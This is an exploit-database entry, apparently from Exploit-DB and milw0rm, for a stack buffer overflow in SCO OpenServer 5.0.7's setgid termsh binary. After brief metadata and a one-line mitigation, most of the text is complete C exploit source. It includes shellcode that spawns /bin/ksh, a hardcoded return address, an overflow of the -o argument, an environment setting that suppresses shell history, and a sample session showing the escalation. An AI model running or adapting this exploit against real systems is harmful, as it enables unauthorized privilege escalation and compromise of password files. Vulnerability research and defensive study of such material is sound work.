SCO Openserver 5.0.7 termsh exploit

vendor:

Openserver 5.0.7

by:

prdelka

7.2

CVSS

HIGH

Stack-based Buffer Overflow

119

CWE

Product Name: Openserver 5.0.7

Affected Version From: SCO Openserver 5.0.7

Affected Version To: SCO Openserver 5.0.7

Patch Exists: YES

Related CWE: N/A

CPE: o:sco:openserver_5.0.7

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: SCO_SV scosysv 3.2 5.0.7 i386

2005

SCO Openserver 5.0.7 termsh exploit

A stack based overflow exists in the handling of command line arguements, namely the [-o oadir] arguement. It is installed setgid auth in a default SCO Openserver 5.0.7 install. An attacker may use this flaw to gain write access to /etc/passwd or /etc/shadow allowing for local root compromise.

Mitigation:

Upgrade to the latest version of SCO Openserver 5.0.7

Source

Exploit-DB raw data:

/* SCO Openserver 5.0.7 termsh exploit
 * ===================================
 * 'termsh' is a program to view or modify an existing terminal entry on
 * SCO Openserver. A stack based overflow exists in the handling of command
 * line arguements, namely the [-o oadir] arguement. It is installed setgid
 * auth in a default SCO Openserver 5.0.7 install. An attacker may use this
 * flaw to gain write access to /etc/passwd or /etc/shadow  allowing for
 * local root compromise.
 *
 * Example use.
 * $ id
 * uid=200(user) gid=50(group) groups=50(group)
 * $ uname -a
 * SCO_SV scosysv 3.2 5.0.7 i386
 * $ gcc prdelka-vs-SCO-termshx.c -o prdelka-vs-SCO-termshx
 * $ ./prdelka-vs-SCO-termshx /opt/K/SCO/Unix/5.0.7Hw/usr/lib/sysadm/termsh
 * [ SCO Openserver 5.0.7 termsh local privilege escalation exploit
 * $ id
 * uid=200(user) gid=50(group) egid=21(auth) groups=50(group)
 *
 * - prdelka
 */
#include <stdio.h>
#include <stdlib.h>

char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90"
                 "\x68\xff\xf8\xff\x3c\x6a\x65\x89"
                 "\xe6\xf7\x56\x04\xf6\x16\x31\xc0"
                 "\x50\x68""/ksh""\x68""/bin""\x89"
                 "\xe3\x50\x50\x53\xb0\x3b\xff\xd6";

int main(int argc,char* argv[])
{
        char* buffer;
        char* arg = "-o";
        char *env[] = {"HISTORY=/dev/null",NULL};
        long eip,ptr;
        int i;
        printf("[ SCO Openserver 5.0.7 termsh local privilege escalation exploit\n");
        if(argc < 2)
        {
                printf("[ Error  : [path]\n[ Example: %s /opt/K/SCO/Unix/5.0.7Hw/usr/lib/sysadm/termsh\n",argv[0]);
                exit(0);
        }
        eip = 0xa2080853;
        buffer = malloc(7449 + strlen(shellcode));
        memset(buffer,'\x00',7449 + strlen(shellcode));
        ptr = (long)buffer + strlen(shellcode);
        strncpy(buffer,shellcode,strlen(shellcode));
        for(i = 1;i <= 1862;i++)
        {
                memcpy((char*)ptr,(char*)&eip,4);
                ptr = ptr + 4;
        }
        execle(argv[1],argv[1],arg,buffer,NULL,env);
        exit(0);
}

// milw0rm.com [2006-01-03]